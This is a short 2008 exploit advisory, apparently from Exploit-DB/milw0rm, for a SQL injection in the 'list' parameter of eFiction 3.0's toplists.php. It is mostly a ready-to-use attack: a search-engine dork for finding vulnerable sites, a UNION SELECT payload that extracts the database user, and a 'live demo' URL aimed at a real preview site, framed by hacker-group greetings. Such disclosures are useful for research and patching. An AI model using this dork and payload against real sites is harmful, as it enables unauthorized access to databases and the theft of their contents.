eFiction 3.0 - 'toplists.php' SQL Injection

EDB-ID:

5785

Author:

Mr.SQL

Type:

webapps

Platform:

PHP

Published:

2008-06-11

###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## rEm0te SQL InjEcti0n VulnErability
##
## eFiction 3.0 (( toplists.php list ))
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.PaL-HaCkEr.CoM
##
## Email  : SQL@Hotmail.it
##
########################
########################
##
## Script Name : eFiction 3.0
##
## Download : www.efiction.hugosnebula.com
##
########################
########################
##    
## d0rk ::    allinurl: "toplists.php?list"
##
##   
## -(:: SQL ::)-
##    www.Site.com/toplists.php?list=(SQL)
##            1'+union+select+1,2,current_user,4,5,6,7,8/*                    
##
########################
##
## -(:: L!ve Demo ::)-
##            http://efiction.hugosnebula.com/preview/toplists.php?list=1'+and+1=0+union+select+1,2,current_user,4,5,6,7,8/*
##
########################
########################
######################################################################################################
######################################################################################################
                                   -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
:: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
######################################################################################################
######################################################################################################

# milw0rm.com [2008-06-11]